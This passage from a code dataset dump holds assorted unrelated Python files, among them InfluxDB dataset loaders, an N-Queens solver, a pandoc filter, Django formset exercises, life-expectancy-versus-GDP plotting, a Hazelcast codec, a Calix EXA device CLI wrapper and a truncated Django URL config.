enumerate(grams)}\n\n vectorX = np.zeros((len(newX), len(grams)))\n\n for i, x in enumerate(newX):\n for g in x:\n vectorX[i,grams2id[g]] += 1 / (self.gamma_*self.freqs_[g])\n\n vectorX[vectorX != 0] = np.log(vectorX[vectorX != 0])\n vectorX = MinMaxScaler().fit_transform(vectorX)\n\n if ret_dict:\n return vectorX, id2grams\n else:\n return vectorX\n\n def transform_cut(self, X, low=0, high=-1):\n # check whether the model has been fitted
\n def transform_cut(self, X, low=0, high=-1):\n # check that the model has been fitted\n check_is_fitted(self, ['freqs_'])\n\n if high > 0:\n self.check_args(low, high)\n newX = self.cutGrams_(self.toNGrams_(X), low, high)\n return newX\n else:\n newX = self.toNGrams_(X)\n return newX\n","sub_path":"src/bow/normBagOfWords.py","file_name":"normBagOfWords.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"179075894","text":"import pandas as pd\nimport os\nimport collections\n\nclass BaseDataset(object):\n\n def list_metrics(self):\n raise NotImplementedError()\n\n def list_hosts(self, metric):\n raise NotImplementedError()\n\n def get_dataframe(self, metric, host, time_from='2018-01-01 00:00:00', time_till='2019-01-01 00:00:00'):\n raise NotImplementedError()\n\n def get_timeseries(self, metric, host):\n raise NotImplementedError()\n\nclass CSVDataset(BaseDataset):\n def __init__(self):\n DATASET_DIR = 'sample_dataset'\n curr_path = os.path.dirname(os.path.abspath(__file__))\n self.dataset_path = os.path.join(curr_path, DATASET_DIR)\n\n def list_metrics(self):\n metrics = []\n for filename in os.listdir(self.dataset_path):\n counter_filename = collections.Counter(filename)\n if counter_filename['.'] == 2 and filename.endswith('.csv'):\n metrics.append(filename.split('.')[0])\n return list(set(metrics))\n\n def list_hosts(self, metric):\n hosts = []\n for filename in os.listdir(self.dataset_path):\n if filename.startswith(metric):\n counter_filename = collections.Counter(filename)\n if counter_filename['.'] == 2 and filename.endswith('.csv'):\n hosts.append(filename.split('.')[1])\n return list(set(hosts))\n\n def get_file_name(self, metric, host):\n return os.path.join(self.dataset_path, '{}.{}.csv'.format(metric, host))\n\n def get_dataframe(self, metric, host, time_from=None, time_till=None):\n file_name = self.get_file_name(metric, host)\n return pd.read_csv(file_name)\n\n def get_timeseries(self, metric, host, time_from=None, time_till=None):\n df = self.get_dataframe(metric, host, time_from, time_till)\n df.set_index('time', inplace=True)\n return df['value']\n\n def timeserie_to_csv(self, metric, host, datapoints):\n file_name = self.get_file_name(metric, host)\n datapoints.to_csv(file_name, index=False)\n\n\nclass JSONDataset(BaseDataset):\n def __init__(self):\n DATASET_DIR = 'json_dataset'\n curr_path = os.path.dirname(os.path.abspath(__file__))\n self.dataset_path = os.path.join(curr_path, DATASET_DIR)\n\n def save_metric_datapoints(self, metric):\n influx_dataset = InfluxDBDataset()\n metric_index = 0\n\n hosts = influx_dataset.list_hosts_small_names(metric)\n for host in hosts:\n file_name = os.path.join(self.dataset_path, '{}_{}.json'.format(metric, host))\n file = open(file_name, 'w')\n datapoints = influx_dataset.get_dataframe(metric, host) # was get_timeserie, which InfluxDBDataset does not define; get_dataframe keeps the 'time' column used below\n for index, row in datapoints.iterrows():\n metric_index += 1\n file.write('{\"index\": {\"_index\":\"zabbix_metrics_%s\",\"_type\":\"%s\",\"_id\":\"%s\"}}\\n' % (metric, metric, str(metric_index)))\n file.write('{\"@timestamp\":\"%s\",\"host_name\":\"%s\",\"value\":%s}\\n' % (str(row['time'].strftime(\"%Y-%m-%dT%H:%M:%S\")), host, str(row['value'])))\n file.close()\n\n def save_all_metrics(self):\n influx_dataset = InfluxDBDataset()\n metrics = influx_dataset.list_metrics()\n for metric in metrics:\n self.save_metric_datapoints(metric)\n\nclass InfluxDBDataset(BaseDataset):\n def __init__(self):\n from influxdb import InfluxDBClient\n influxdb_host = 'localhost'\n influxdb_port = 8086\n influx_database= 
'metricas_hist'\n self.influxdb_client = InfluxDBClient(host=influxdb_host, port=influxdb_port, database=influx_database)\n\n def list_metrics(self):\n metrics = []\n sql = \"show measurements\"\n ret_df = self.influxdb_client.query(sql)\n for item in ret_df['measurements']:\n metrics.append(item['name'])\n return metrics\n\n def list_hosts(self, metric):\n hosts = []\n sql = \"SHOW TAG VALUES with key = host_name\"\n ret_df = self.influxdb_client.query(sql)\n for item in ret_df[metric]:\n hosts.append(item['value'])\n return hosts\n\n def list_hosts_small_names(self, metric):\n hosts = []\n sql = \"SHOW TAG VALUES with key = host_name\"\n ret_df = self.influxdb_client.query(sql)\n for item in ret_df[metric]:\n hostname = item['value']\n if len(hostname) < 19:\n hosts.append(hostname)\n return hosts\n\n def get_dataframe(self, metric, host, time_from='2018-01-01 00:00:00', time_till='2019-01-01 00:00:00'):\n\n sql = \"\"\"SELECT time, value\n FROM {}\n WHERE host_name = '{}'\n AND time >= '{}'\n AND time <= '{}'\n \"\"\".format(metric, host, time_from, time_till)\n result_set = self.influxdb_client.query(sql)\n time = []\n value = []\n for item in result_set.get_points():\n time.append(item['time'])\n value.append(item['value'])\n my_dataframe = pd.DataFrame(\n {'time': time,\n 'value': value\n })\n my_dataframe['time'] = pd.to_datetime(my_dataframe['time'])\n return my_dataframe\n\n def get_timeseries(self, metric, host, time_from='2018-01-01 00:00:00', time_till='2019-01-01 00:00:00'):\n df = self.get_dataframe(metric, host, time_from, time_till)\n df.set_index('time', inplace=True)\n return df['value']\n\n\n def get_metric_timeserie(self, metric):\n sql = \"select time, host_name, value from {}\".format(metric)\n result_set = self.influxdb_client.query(sql)\n time = []\n host_name = []\n value = []\n for item in result_set.get_points():\n time.append(item['time'])\n host_name.append(item['host_name'])\n value.append(item['value'])\n my_dataframe = pd.DataFrame(\n {'time': time,\n 'host_name': host_name,\n 'value': value\n })\n my_dataframe['time'] = pd.to_datetime(my_dataframe['time'])\n return my_dataframe\n","sub_path":"apps/mestrado_projeto_anomalias/util/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"230913914","text":"class Solution:\n def solveNQueens(self, N: int) -> List[List[str]]:\n ans = []\n board = [['.'] * N for _ in range(N)]\n\n def place(i: int, vert: int, ldiag: int, rdiag: int) -> None:\n if i == N:\n ans.append([\"\".join(row) for row in board])\n return\n for j in range(N):\n vmask, lmask, rmask = 1 << j, 1 << (i+j), 1 << (N-i-1+j)\n if vert & vmask or ldiag & lmask or rdiag & rmask:\n continue\n board[i][j] = 'Q'\n place(i+1, vert | vmask, ldiag | lmask, rdiag | rmask)\n board[i][j] = '.'\n\n place(0, 0, 0, 0)\n return ans\n","sub_path":"May LeetCoding Chanllenge 2021/22 N-Queens/N-Queens.py","file_name":"N-Queens.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"117470583","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport re\n\nfrom pandocfilters import toJSONFilter, stringify, get_caption, RawInline, Str, Space, Table, Plain, OrderedList, BulletList, Math, Cite\n\ndef inlatex(s):\n\treturn RawInline('latex', s)\n\ndef get_label(label):\n\tif ':' in label:\n\t\treftype = label.split(':')[0]\n\t\tif reftype == 'sec' or 
reftype == 'section':\n\t\t\trefcommand = 'jsecref'\n\t\telif reftype == 'eq' or reftype == 'equation':\n\t\t\trefcommand = 'jeqref'\n\t\telif reftype == 'fig' or reftype == 'figure':\n\t\t\trefcommand = 'jfigref'\n\t\telif reftype == 'tbl' or reftype == 'table':\n\t\t\trefcommand = 'jtblref'\n\t\telif reftype == 'theo' or reftype == 'theorem':\n\t\t\trefcommand = 'jtheoref'\n\t\telif reftype == 'def' or reftype == 'definition':\n\t\t\trefcommand = 'jdefref'\n\t\telif reftype == 'exam' or reftype == 'example':\n\t\t\trefcommand = 'jexamref'\n\t\telse:\n\t\t\trefcommand = 'ref'\n\telse:\n\t\trefcommand = 'cite'\n\treturn(inlatex(\"\\\\%s{%s}\" % (refcommand,label)))\n\nclass PandocContents():\n\tdef __init__(self, str):\n\t\tself.contents = list()\n\t\tself.id = None\n\t\tself.classes = list()\n\t\tself.keyvals = dict()\n\t\tattr = re.compile('\\{(.+?)\\}')\n\t\tattrs = ' '.join(attr.findall(str)).split(' ')\n\t\tfor att in attrs:\n\t\t\tif att.startswith('#'):\n\t\t\t\tself.id = att[1:]\n\t\t\telif att.startswith('.'):\n\t\t\t\tself.classes.append(att[1:])\n\t\t\telif '=' in att:\n\t\t\t\tkeyvals = att.split(\"=\")\n\t\t\t\tself.keyvals[keyvals[0]] = keyvals[1]\n\t\tref = re.compile('\\[@(.+?)\\]')\n\t\tfor c in re.split('\\s+', attr.sub('', str).strip()):\n\t\t\tif len(c) == 0:\n\t\t\t\tpass\n\t\t\tif len(self.contents) > 0:\n\t\t\t\tself.contents.append(Space())\n\t\t\tstart = 0\n\t\t\tend = len(c)\n\t\t\twhile start < end:\n\t\t\t\ttref = ref.search(c, start, end)\n\t\t\t\tif tref is None:\n\t\t\t\t\tself.contents.append(Str(c[start:end]))\n\t\t\t\t\tstart = end\n\t\t\t\telse:\n\t\t\t\t\tif tref.start() > start:\n\t\t\t\t\t\tself.contents.append(Str(c[start:tref.start()]))\n\t\t\t\t\tlabel = ref.split(c[tref.start():tref.end()])[1]\n\t\t\t\t\tself.contents.append(get_label(label))\n\t\t\t\t\tstart = tref.end()\n\t\treturn\n\tdef get_contents_with_label(self):\n\t\tcontents = self.contents[:]\n\t\tif self.id is not None:\n\t\t\tcontents.append(inlatex(\"\\\\label{%s}\" % self.id))\n\t\tif len(contents) == 0:\n\t\t\treturn []\n\t\treturn contents\n\ndef pandocfilter(key, value, fmt, meta):\n\tif key == 'Table':\n\t\t[caption, alignment, data, header, rows] = value\n\t\tif len(caption) == 0:\n\t\t\treturn\n\t\tcaption = PandocContents(stringify(caption))\n\t\treturn [Table(caption.get_contents_with_label(), alignment, data, header, rows)]\n\telif key == 'Math' and value[0][\"t\"] == 'DisplayMath':\n\t\t[mathtype, mathcode] = value\n\t\tattr = re.compile('\\{#(.+?)\\}')\n\t\tif attr.search(mathcode) is None:\n\t\t\treturn\n\t\tlabels = attr.findall(mathcode)\n\t\tfor l in labels:\n\t\t\tml = r\"\\\\\\\\label{%s}\" % l\n\t\t\tmathcode = attr.sub(ml, mathcode, count=1)\n\t\treturn [Math(mathtype, mathcode)]\n\telif key == 'Cite':\n\t\tret = list()\n\t\t[citeinfo, contents] = value\n\t\tfor ci in citeinfo:\n\t\t\tlabel = ci['citationId']\n\t\t\tret.append(get_label(label))\n\t\tif len(ret) > 0:\n\t\t\treturn ret\n\ndef main():\n\ttoJSONFilter(pandocfilter)\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"filters/crossref_bw.py","file_name":"crossref_bw.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"187639824","text":"#============= PART 1 ===============\n# Challenge Task 1 of 2\n# Creating products one at a time is getting tedious. I want to be able to make multiple at a time.\n# In forms.py, create a model formset factory for the Digital model. 
Include the same fields as the DigitalProductForm. Name the factory DigitalFormset.\n\n\nfrom django import forms\n\nfrom . import models\n\n\nclass DigitalProductForm(forms.ModelForm):\n class Meta:\n model = models.Digital\n fields = ['name', 'description', 'url']\n\nDigitalFormset = forms.modelformset_factory(\n models.Digital,\n form = DigitalProductForm\n)\n\n\n# Challenge Task 2 of 2\n# Great! That's definitely going to help. Can you go one step further, though?\n\n# I want to be able to make five (5) products at a time. Can you set extra and max_num to both be 5?\n\n\nfrom django import forms\n\nfrom . import models\n\n\nclass DigitalProductForm(forms.ModelForm):\n class Meta:\n model = models.Digital\n fields = ['name', 'description', 'url']\n\nDigitalFormset = forms.modelformset_factory(\n models.Digital,\n form = DigitalProductForm,\n extra = 5,\n max_num = 5\n)\n\n#============= PART 2 ===============\n# Challenge Task 1 of 1\n# Now that we have a solid formset factory, we need to use it in a view.\n\n# I've already set up a view, bulk_create_product, but it doesn't do anything on POST requests.\n\n# Update the view so that POST requests, if valid, populate and save the formset. After saving, it should return a redirect to the URL named \"products:bulk_create\".\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\n\nfrom . import forms\n\n\ndef product_form(request):\n form = forms.DigitalProductForm()\n if request.method == 'POST':\n form = forms.DigitalProductForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('products:create'))\n return render(request, 'products/product_form.html', {'form': form})\n\n\ndef bulk_create_products(request):\n formset = forms.DigitalFormset()\n if request.method == 'POST':\n formset = forms.DigitalFormset(request.POST)\n if formset.is_valid():\n formset.save()\n return HttpResponseRedirect(reverse('products:bulk_create'))\n return render(request, 'products/bulk_create.html', {'formset': formset})\n\n#============= PART 3 ===============\n\n\n# Challenge Task 1 of 2\n# I want to be able to create a Review in the same form as where I create a Product. That means I need an inline form!\n\n# Create an inline model formset factory, named ReviewFormset, for the Review model. You need to include all the same fields as the existing ReviewForm.\n\n# Remember, the first argument to the factory is the parent model (Product) and the second is the model the factory is for (Review).\n\nfrom django import forms\n\nfrom . import models\nfrom products.models import Product\n\n\nclass ReviewForm(forms.ModelForm):\n class Meta:\n model = models.Review\n fields = ('headline', 'rating', 'content', 'writer', 'publish_date')\n\nReviewFormset = forms.inlineformset_factory(\n models.Product,\n models.Review,\n fields = ('headline', 'rating', 'content', 'writer', 'publish_date')\n)\n\n\n# Challenge Task 2 of 2\n# Great! By default, I get 3 extra forms. That's a lot for a single view since they're big forms. Can you change it so I only get 1 extra?\n\nfrom django import forms\n\nfrom . 
import models\nfrom products.models import Product\n\n\nclass ReviewForm(forms.ModelForm):\n class Meta:\n model = models.Review\n fields = ('headline', 'rating', 'content', 'writer', 'publish_date')\n\nReviewFormset = forms.inlineformset_factory(\n models.Product,\n models.Review,\n fields = ('headline', 'rating', 'content', 'writer', 'publish_date'),\n extra = 1\n)\n","sub_path":"team_treehouse/python_web_tech_degree/unit_7/django_forms/topic_4.py","file_name":"topic_4.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"478864018","text":"#Calculate Average values and plot\n##1900 - 1980\n# International average gdp\namoy_gdp = []\nfor i in range(len(avaleurs_gdp_nonenull)):\n amoy_gdp.append((round(np.sum(avaleurs_gdp_nonenull[i])/len(alst_gdp_nonenull)))) \n#International average Life expectancy\namoy_lifeexpectancy = []\nfor i in range(len(avaleurs_life_expectancy_nonenull)):\n amoy_lifeexpectancy.append(np.sum(avaleurs_life_expectancy_nonenull[i])/len(alst_longevity_nonenull))\n\n\nfor i in tqdm_notebook(range(200), desc ='loop'):\n sleep(0.01)\n\n#### fig. 1 Evolution Longevity vs GDP per years \n# a. International average Longevity over time (#Left figure)\n#-------------[1900 - 1978]--------------\nnrows = 1\nncols = 2\nfig = plt.figure(figsize=(18,7))\nx = alst_years\ny = amoy_lifeexpectancy\nz = amoy_gdp\nax1 = fig.add_subplot(nrows, ncols, 1)\nax1.plot(x, y, color = 'blue', label = 'International average longevity', linewidth=2)\nax1.set_aspect(1./ax1.get_data_ratio())\nplt.yticks(np.arange(min(y), max(y)+2, 2))\nplt.ylabel('Average longevity for years [1900-1980]')\nplt.xlabel('Time [1900 - 1980]')\nplt.legend(loc=\"upper left\")\nespace2 = ax1.twinx()\nespace2.plot(x, z, color = 'green', label = 'International average GDP', linewidth=2)\nplt.xlabel('Time [1900-1980]')\nplt.ylabel('Average GDP')\nplt.xticks(np.arange(min(x), max(x)+2, 5))\nplt.legend(loc=\"center left\")\n#-------------[1900 - 1980]--------------\n#b. 
Preston curve GDP - Income (#Right figure)\nax2 = fig.add_subplot(nrows, ncols, 2)\nx2 = amoy_gdp\ny2 = amoy_lifeexpectancy\nax2.scatter(x2,y2,color='blue',edgecolor='none',label = 'International average Longevity per GDP',linewidth=2)\nax2.set_aspect(1./ax2.get_data_ratio())\nz2 = np.polyfit(x2, y2,2)\np = np.poly1d(z2) ## Thanks Stackoverflow https://stackoverflow.com/questions/18767523/fitting-data-with-numpy\npylab.plot(x2,p(x2),\"r--\", label = 'Trend line')\nplt.ylabel('International average longevity [1900-1980]')\nplt.yticks(np.arange(min(y2)-1, max(y2)+2, 2))\nplt.xlabel('International average GDP per year [1900-1980]')\nplt.legend(loc=\"upper left\")\nplt.show()\n\nprint('1.1/ Longevity progress - [1900 - 1980]\\na) For the period between {} - {}, the international average life expectancy has risen by +{}%'.format(alst_years[15],alst_years[35],round(((amoy_lifeexpectancy[35] - amoy_lifeexpectancy[15])/amoy_lifeexpectancy[15])*100, 1)))\nprint('b) For the period between {} - {}, the international average life expectancy has risen by +{}%'.format(alst_years[45],alst_years[65],round(((amoy_lifeexpectancy[65] - amoy_lifeexpectancy[45])/amoy_lifeexpectancy[45])*100, 1)))\nprint('c) For the period between {} - {}, the international average life expectancy has risen by +{}%'.format(alst_years[65],alst_years[75],round(((amoy_lifeexpectancy[75] - amoy_lifeexpectancy[65])/amoy_lifeexpectancy[65])*100, 1)))\nprint('1.2/ Income progress [1900 - 1980]\\na) For the period between {} - {}, the international average income ppp varied by +{}%'.format(alst_years[15],alst_years[35],round(((amoy_gdp[35] - amoy_gdp[15])/amoy_gdp[15])*100, 1)))\nprint('b) For the period between {} - {}, the international average income ppp varied by +{}%'.format(alst_years[45],alst_years[65],round(((amoy_gdp[65] - amoy_gdp[45])/amoy_gdp[45])*100, 1)))\nprint('c) For the period between {} - {}, the international average income ppp varied by +{}%'.format(alst_years[65],alst_years[75],round(((amoy_gdp[75] - amoy_gdp[65])/amoy_gdp[65])*100, 1)))\nprintmd('\\nThe rapid increase in life expectancy that happened in the mid-40s could be explained by the discovery of penicillin, whose production scaled up by early 1944. However, the relationship suggests that living standards, as captured by income, were a dominant determinant of mortality. ')\n
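\n# An optional goodness-of-fit check for the quadratic Preston-curve trend above\n# (a sketch for illustration; it assumes the x2, y2 and p objects defined for fig. 1 are still in scope):\n# y_hat = p(np.asarray(x2))\n# ss_res = np.sum((np.asarray(y2) - y_hat) ** 2)\n# ss_tot = np.sum((np.asarray(y2) - np.mean(y2)) ** 2)\n# r_squared = 1 - ss_res / ss_tot # closer to 1 means the curve tracks the data more closely\n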
\n\n#Calculate Average values and plot\n\n##1980 - 2015 \n#International average gdp per year \nmoy_gdp = []\nfor i in range(len(valeurs_gdp_nonenull)):\n moy_gdp.append((round(np.sum(valeurs_gdp_nonenull[i])/len(lst_gdp_nonenull)))) \n#International average Life expectancy\nmoy_lifeexpectancy = []\nfor i in range(len(valeurs_life_expectancy_nonenull)):\n moy_lifeexpectancy.append(np.sum(valeurs_life_expectancy_nonenull[i])/len(lst_longevity_nonenull))\n##########################################################################################################################\n##### fig. 2 Evolution Longevity vs GDP per years \n# a. International average Longevity over time \n\nfig = plt.figure(figsize=(18, 7))\nnrows = 1\nncols = 2\n#-------------[1980 - 2015]--------------\n# a. International average Longevity over time (#left figure)\nax1 = fig.add_subplot(nrows, ncols, 1)\nx1 = lst_years\ny1 = moy_lifeexpectancy\nz1 = moy_gdp\nax1.plot(x1, y1, color = 'blue', label = 'International average longevity', linewidth=2)\nplt.yticks(np.arange(min(y1), max(y1)+2, 2))\nplt.xlabel('Time [1980-2015]')\nplt.ylabel('Average longevity for years [1980-2015]')\nplt.legend(loc=\"upper left\")\nespace1 = ax1.twinx()\nespace1.plot(x1, z1, color = 'green', label = 'International average GDP', linewidth=2)\nplt.ylabel('Average GDP')\nplt.xticks(np.arange(min(x1), max(x1)+2, 5))\nplt.legend(loc=\"center left\")\n#-------------[1980-2015]--------------\n#b. Preston curve GDP - Income (#right figure)\nax2 = fig.add_subplot(nrows, ncols, 2)\nx2 = moy_gdp\ny2 = moy_lifeexpectancy\nax2.scatter(x2,y2,color='blue',edgecolor='none', label = 'International average longevity per GDP', linewidth=2)\nax2.set_aspect(1./ax2.get_data_ratio()) # Help of http://people.duke.edu/~ccc14/pcfb/numpympl/MatplotlibBarPlots.html\nz2 = np.polyfit(x2, y2,2)\np = np.poly1d(z2) ## Thanks Stackoverflow https://stackoverflow.com/questions/18767523/fitting-data-with-numpy\npylab.plot(x2,p(x2),\"r--\", label = 'Trend line')\nplt.xlabel('International average GDP per year [1980-2015]')\nplt.ylabel('International average longevity [1980-2015]')\nplt.yticks(np.arange(min(y2), max(y2), 2))\nplt.legend(loc=\"upper left\")\nplt.show()\n\n\nprint('2.1/ Longevity progress [1980 - 2015]\\na) For the period between {} - {}, the international average life expectancy has risen by {}%'.format(lst_years[0],lst_years[10], round(((moy_lifeexpectancy[10] - moy_lifeexpectancy[0])/moy_lifeexpectancy[0])*100, 1)))\nprint('b) For the period between {} - {}, the international average life expectancy has risen by {}%'.format(lst_years[10],lst_years[20], round(((moy_lifeexpectancy[20] - moy_lifeexpectancy[10])/ moy_lifeexpectancy[10])*100, 1)))\nprint('c) For the period between {} - {}, the international average life expectancy rose by {}%'.format(lst_years[20],lst_years[30], round(((moy_lifeexpectancy[30] - moy_lifeexpectancy[20])/ moy_lifeexpectancy[20])*100, 1)))\nprint('2.2/ Income progress [1980 - 2015]\\na) For the period between {} - {}, the international average income ppp varied by {}%'.format(lst_years[0],lst_years[10], round(((moy_gdp[10] - moy_gdp[0])/moy_gdp[0])*100, 1)))\nprint('b) For the period between {} - {}, the international average income ppp varied by {}%'.format(lst_years[10],lst_years[20], round(((moy_gdp[20] - moy_gdp[10])/ moy_gdp[10])*100, 1)))\nprint('c) For the period between {} - {}, the international average income ppp varied by {}%'.format(lst_years[20],lst_years[30], round(((moy_gdp[30] - moy_gdp[20])/ moy_gdp[20])*100, 1)))\nprint('\\nThe Preston curve, revisited using the international average values to measure the responsiveness of longevity to a change in GDP, indicates a shift in the curve that has declined in magnitude since 1960. 
It means that at a certain level of income, there is less and less impact on the longevity.')\n","sub_path":"python_code/exploratory_data_analysis1.py","file_name":"exploratory_data_analysis1.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"101338730","text":"from hazelcast.serialization.data import *\nfrom hazelcast.serialization.bits import *\nfrom hazelcast.protocol.client_message import ClientMessage\nfrom hazelcast.protocol.custom_codec import *\nfrom hazelcast.protocol.codec.transaction_message_type import *\n\nREQUEST_TYPE = TRANSACTION_COMMIT\nRESPONSE_TYPE = 100\nRETRYABLE = False\n\n\ndef calculate_size(transaction_id, thread_id):\n \"\"\" Calculates the request payload size\"\"\"\n data_size = 0\n data_size += calculate_size_str(transaction_id)\n data_size += LONG_SIZE_IN_BYTES\n return data_size\n\n\ndef encode_request(transaction_id, thread_id):\n \"\"\" Encode request into client_message\"\"\"\n client_message = ClientMessage(payload_size=calculate_size(transaction_id, thread_id))\n client_message.set_message_type(REQUEST_TYPE)\n client_message.set_retryable(RETRYABLE)\n client_message.append_str(transaction_id)\n client_message.append_long(thread_id)\n client_message.update_frame_length()\n return client_message\n\n\ndef decode_response(client_message):\n \"\"\" Decode response from client message\"\"\"\n parameters = dict()\n return parameters\n\n\n\n","sub_path":"hazelcast/protocol/codec/transaction_commit_codec.py","file_name":"transaction_commit_codec.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"478809641","text":"import re\nimport time\nfrom cafe.core.logger import CLogger as Logger\nfrom cafe.topology.topo import get_topology\nfrom cafe.core.signals import EXA_SESSION_ERROR\nfrom cafe.resp.response_map import ResponseMap\nfrom cafe.core.db import teststep\n\nlogger = Logger(__name__)\ndebug = logger.debug\nerror = logger.error\ndebug(\"importing module %s\" % __name__)\n\n\ndef get_exa_class(name, session, session_type=\"ssh\", release=None):\n return CalixExaBase(name, session, session_type, release)\n\nclass CalixExaBase(object):\n \"\"\"\n base class of EXA interfaces\n \"\"\"\n LOGIN_PROMPT = \"login:\\s+$\"\n PASSWORD_PROMPT = \"assword:\\s+$\"\n EXA_PROMPT = \"\\S+#\\s*$\"\n BASH_PROMPT = \"\\S+@\\S+:\\S+#\\s+$\"\n CONFIG_PROMPT = \"\\S+\\(config\\)#\\s+$\"\n\n def __init__(self, name, session, session_type=\"ssh\", release=None):\n \"\"\"\n \"\"\"\n self.name = name\n self.session = session\n self.session.prompt.extend([self.LOGIN_PROMPT, self.PASSWORD_PROMPT, self.EXA_PROMPT,\n self.BASH_PROMPT, self.CONFIG_PROMPT])\n self.session_type = session_type\n self.release = release\n\n def command(self, cmd=\"\", timeout=30):\n if self.session_type == \"ssh\":\n r = self.session.expect_prompt(timeout=0)\n\n self.session.write(cmd)\n # return tuple (prompt index, , text)\n r = self.session.expect_prompt(timeout=timeout)\n\n if \"error:\" in r[2]:\n status = False\n else:\n status = True\n if r[0] < 0:\n return {\"status\": status, \"prompt\": None, \"response\": r[2]}\n else:\n return {\"status\": status, \"prompt\": r[1].group(), \"response\": r[2]}\n\n def __prompt_matches(self, prompt, regex):\n ret = True\n\n if (prompt is None) or (re.match(regex, prompt) is None):\n ret = False\n\n return ret\n\n def login(self):\n if self.session_type != \"telnet\":\n 
self.session.login()\n\n prompt = self.command(cmd=\"\\x03\")['prompt']\n self.cli(prompt)\n\n def cli(self, prompt):\n # print(\"[[[[[%s|%s]]]]]\" % (prompt, self.EXA_PROMPT))\n if self.__prompt_matches(prompt, self.CONFIG_PROMPT):\n self.command(\"top\")\n next_prompt = self.command(cmd=\"exit\")['prompt']\n elif self.__prompt_matches(prompt, self.LOGIN_PROMPT):\n next_prompt = self.command(cmd=self.session.user)['prompt']\n elif self.__prompt_matches(prompt, self.PASSWORD_PROMPT):\n next_prompt = self.command(cmd=self.session.password)['prompt']\n elif self.__prompt_matches(prompt, self.BASH_PROMPT):\n next_prompt = self.command(cmd=\"cli\")['prompt']\n elif self.__prompt_matches(prompt, self.EXA_PROMPT):\n return\n else:\n error(\" - attempt to get to CLI level resulted in an undefined state. Prompt: %s\" % prompt)\n return\n\n self.cli(next_prompt)\n\n def in_known_state(self, prompt):\n known_states = [self.LOGIN_PROMPT, self.BASH_PROMPT, self.CONFIG_PROMPT, self.EXA_PROMPT, self.PASSWORD_PROMPT]\n\n match = False\n\n for i in known_states:\n if self.__prompt_matches(prompt, i):\n match = True\n break\n\n return match\n\n def reload(self):\n prompt = self.command(cmd=\"\\x03\")['prompt']\n self.cli(prompt)\n print(self.command(\"reload\"))\n print(self.command(\"y\"))\n\n reboot_successful = True\n\n if self.session_type == \"telnet\":\n num_retries = 15\n wait_time = 30\n\n while (not self.in_known_state(self.command(timeout=wait_time)['prompt'])) and (num_retries > 0):\n time.sleep(wait_time)\n num_retries -= 1\n\n if num_retries <= 0:\n reboot_successful = False\n elif self.session_type == \"ssh\":\n num_retries = 20\n wait_time = 20\n\n time.sleep(5)\n\n disconnected = True\n\n initial_disconnect = False\n\n while disconnected and (num_retries >= 0):\n try:\n self.login()\n disconnected = False\n except Exception as e:\n #print(e.message)\n initial_disconnect = True\n\n time.sleep(wait_time)\n # print(\"retries left: %s\" % num_retries)\n num_retries -= 1\n\n reboot_successful = not disconnected\n\n if reboot_successful:\n c = self.command(cmd=\"\\x03\")\n #print(c)\n prompt = c['prompt']\n self.cli(prompt)\n debug(\" - reloaded successfully\")\n else:\n error(\" - failed to reload device!\")\n\n def reconnect(self):\n reboot_successful = True\n\n if self.session_type == \"telnet\":\n num_retries = 15\n wait_time = 30\n\n while (not self.in_known_state(self.command(timeout=wait_time)['prompt'])) and (num_retries > 0):\n time.sleep(wait_time)\n num_retries -= 1\n\n if num_retries <= 0:\n reboot_successful = False\n elif self.session_type == \"ssh\":\n num_retries = 20\n wait_time = 20\n\n time.sleep(5)\n\n disconnected = True\n\n initial_disconnect = False\n\n while disconnected and (num_retries >= 0):\n try:\n self.login()\n disconnected = False\n except Exception as e:\n #print(e.message)\n initial_disconnect = True\n\n time.sleep(wait_time)\n # print(\"retries left: %s\" % num_retries)\n num_retries -= 1\n\n reboot_successful = not disconnected\n\n if reboot_successful:\n c = self.command(cmd=\"\\x03\")\n #print(c)\n prompt = c['prompt']\n self.cli(prompt)\n debug(\" - reloaded successfully\")\n else:\n error(\" - failed to reload device!\")\n\n @teststep(\"get_interface_craft\")\n def get_interface_craft(self, intf):\n # E5-520# show interface craft 1 | nomore\n # interface craft 1\n # status\n # name \"craft 1\"\n # admin-state enable\n # oper-state unknown\n # mac-addr 00:02:5D:BA:8D:B7\n # net-config-type static\n # ip-address 10.243.19.213\n # ip-mask 255.255.252.0\n # 
ip-gateway 10.243.16.1\n # craft-cntrs\n # rx-pkts 586110\n # rx-octets 170323600\n # tx-pkts 71836\n # tx-octets 14459880\n # dhcp-server disable\n # expect_prompt returns a (prompt index, match object, text) tuple\n r = self.command(cmd=\"show interface craft %s | nomore\" % str(intf))\n resp = r[\"response\"]\n m = ResponseMap(resp)\n d = m.parse_key_value_pairs(start_line=1)\n return d\n\n\n\n\n\n\n\n\n\n\n","sub_path":"equipment/calix/exa.py","file_name":"exa.py","file_ext":"py","file_size_in_byte":7018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"374538990","text":"from django.contrib.auth import views as auth_views\nfrom django.urls import include, path\n\nfrom . import views\nfrom .forms import LoginForm\n\nurlpatterns = [\n\tpath('login', auth_views.login, {'template_name':'accounts/login.html', \n\t\t'authentication_form': LoginForm}, name='login'),\n\tpath('logout', auth_views.logout, {'next_page': '/'}, name='logout'),\n\tpath('signup', views.signup, name='signup'),\n\tpath('guests', views.GuestList.as_view(), name='guest_list'),\n\tpath('admin', 